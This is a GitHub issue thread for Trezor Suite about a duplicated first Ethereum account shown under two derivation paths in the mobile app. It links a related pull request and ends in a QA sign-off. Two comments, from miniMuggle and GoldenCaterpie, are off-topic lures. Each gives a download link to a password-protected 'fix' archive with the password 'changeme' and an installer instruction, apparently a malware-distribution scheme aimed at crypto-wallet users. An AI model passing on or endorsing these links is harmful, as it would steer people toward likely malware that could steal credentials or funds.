### ISSUE TITLE
Doubled ETH account normal vs ledger derivation path

### ISSUE THREAD

**Issue by matejkriz** [trezor/trezor-suite#13996]
**Describe the bug**
I see two Ethereum #1 accounts, both are the same, just different derivation path.

Only the #1 is doubled, other accounts appear only once.

**Info:**

-   Mobile Suite Version: 24.8
-   OS: android

**How to reproduce**

1. Load wallet with Ethereum account (it can be allall seed)
1. See error

**Expected behavior**
I should see no doubled accounts

**Screenshots**
<img width="373" alt="image" src="https://github.com/user-attachments/assets/d56d8e49-d281-459c-a1d1-99c4d68b8979">

**Additional context**
related? https://github.com/trezor/trezor-suite/pull/13734

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Hannsek** [comment]
from https://github.com/trezor/trezor-suite/pull/13734:

> - skip first evm ledger account as it is same as trezor

**Comment by STew790** [comment]
**QA NOK**
Unfortunately, I can still see duplicated account.
![image](https://github.com/user-attachments/assets/227d3894-5e8f-427e-8646-73881c04fd5d)

**Info:**

24.9.1 9ff8920

**Comment by STew790** [comment]
Sorry, this was my bad, the accounts are actually different. I just got confused with the 2 #1 ETH accounts and the EXACTLY same amount and possibly clicked on the same one to check the address :facepalm: 

**QA OK**
